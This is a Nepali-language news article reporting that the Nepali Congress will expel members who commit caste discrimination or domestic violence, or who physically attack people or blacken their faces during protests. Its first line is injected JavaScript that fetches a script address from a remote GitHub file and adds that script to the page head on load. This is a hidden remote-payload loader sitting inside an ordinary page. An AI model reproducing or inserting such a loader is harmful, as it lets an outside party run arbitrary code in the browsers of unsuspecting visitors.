;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
काठमाडौँ — नेपाली कांग्रेसले जातीय भेद्भाव, घरेलु हिंसा वा कसैमाथि कुनै पनि प्रकारको आक्रमण गर्ने व्यक्तिलाई पार्टीबाट तत्काल निष्कासन गर्ने निर्णय गरेको छ । गत साता बसेको केन्द्रीय कार्यसमिति बैठकले पार्टीमा आबद्ध रहेका कोही पनि सदस्यले जातीय विभेद, घरेलु हिंसा या अन्य कुनै पनि सामाजिक विसंगतिहरूमा प्रमाणित एवम् कुनै पनि प्रकृतिका मागहरू सारेर आन्दोलन गर्ने क्रममा अमर्यादित व्यवहार गर्नेलाई पार्टी सदस्य एवम् भ्रातृ र शुभेच्छुक संस्थाको सदस्यबाट निष्कासन गर्ने निर्णय गरेको हो ।
कांग्रेसले कुनै आन्दोलनमा कसैमाथि शारीरिक आक्रमण गर्ने, कालोमोसो दल्नेजस्ता अमर्यादित काम गर्ने व्यक्ति पार्टीको सदस्य नरहनेसमेत निर्णय गरेको छ । ‘जातीय विभेद, घरेलु हिंसा या अन्य कुनै पनि सामाजिक विसंगतिहरुमा प्रमाणित एवं कुनै पनि प्रकृतिका मागहरु सारेर आन्दोलन गर्ने क्रममा अमर्यादित व्यवहार (शारीरिक आक्रमण, कालोमोसो दल्ने आदि) गर्ने पार्टी सदस्य एवं भ्रातृ र शुभेच्छुक संस्थामा आबद्ध व्यक्तिको सदस्यता अविलम्ब खारेज गर्ने निर्णय गर्दछ,’ कांग्रेसको निर्णय छ ।
फेसबुक प्रतिक्रियाहरु